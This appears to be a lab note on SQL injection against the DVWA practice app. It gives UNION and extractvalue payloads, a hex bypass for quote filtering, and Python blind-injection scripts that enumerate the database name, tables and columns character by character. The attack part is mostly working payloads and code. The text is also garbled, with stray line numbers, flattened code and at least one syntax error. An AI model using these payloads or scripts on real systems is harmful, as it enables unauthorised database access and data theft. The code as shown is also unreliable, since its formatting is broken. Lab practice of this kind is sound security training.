union selct联合注入: 1'order by 2# ——有两列 1'union select 1,2# 1' union select database(),2# 1'union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#
payload
1 2
extractvalue报错注入 1' and extractvalue(1,concat('~',database(),'~'))#
1 union select 1,database()# 1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761//这里由于过滤了单引号,所以只能用16进制进行编码然后绕过,dvwa=0x64767761
print("-----开始猜解数据库名-------") databasename = '' for j in range(1,databaselength+1): for i in payloads: database_payload=f"?id=1\'and+substr(database(),{j},1)='{i}'%23&Submit=Submit#" print(database_payload//调试用的 if'exists'in s.get(url+database_payload,headers=headers).text: databasename +=i print('数据库的名字为:'+databasename)
查询表的数目:
1 2 3 4 5 6 7 8
print("-----开始猜解表数-------") for j in range(0,50): table_count=f"?id=1'and (select count(table_name)from information_schema.tables where table_schema=database())={j}%23&Submit=Submit#" print(table_count) if'exists'in s.get(url+table_count,headers=headers).text: tablecount=j print("表的数目是"+str(tablecount)) break
查询表名
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
print("-----开始猜解表名-------") for j in range(0, tablecount): table_name = '' for i in range(0, 50): tab_length = f'?id=1\'and (select length(table_name) from information_schema.tables where table_schema=database() limit {j},1)={i}%23&Submit=Submit#' # print(tablength) if'exists'in s.get(url + tab_length, headers=headers).text: tablength = i print("第一个表长度为:%d" % i) #以上是为了得出每一个表的长度 for m in range(0, tablength+1): for n in payloads: table_payload = f'?id=1\'and substr((select table_name from information_schema.tables where table_schema=database() limit {j},1),{m},1)=\'{n}\'%23&Submit=Submit#' #print(table_payload) if'User ID exists in the database.'in s.get(url + table_payload, headers=headers).text: table_name += n print('table_name%d:'%(j+1)+table_name)
columnNum = 0 for j in range(50): columnNum_payload = '?id=1\' and (select count(column_name) from information_schema.columns where table_name=\'flagishere\')='+str(j)+' %23&Submit=Submit#' if'User ID exists in the database.'in s.get(url+columnNum_payload, headers=headers).text: columnNum = j break print('columnNum: '+str(columnNum))
# 2.爆出每个字段名的长度 for j in range(0,columnNum): column_name = '' for i in range(1,50): columnLen_payload = '?id=1\' and length(substr((select column_name from information_schema.columns where table_name=\'flagishere\' limit '+str(j)+',1),1))='+str(i)+' %23&Submit=Submit#' if'User ID exists in the database.'in s.get(url+columnLen_payload, headers=headers).text: columnLen = i print('column'+str(j+1)+'_length: '+str(columnLen)) # (2)内部循环爆破每个表的表名 for m in range(1,columnLen+1): for n in payloads: # i在上个循环用过了 column_payload = '?id=1\' and substr((select column_name from information_schema.columns where table_name=\'flagishere\' limit '+str(j)+',1),'+str(m)+',1)=\''+str(n)+'\' %23&Submit=Submit#' if'User ID exists in the database.'in s.get(url+column_payload, headers=headers).text: column_name += n print('column'+str(j+1)+'_name: '+column_name)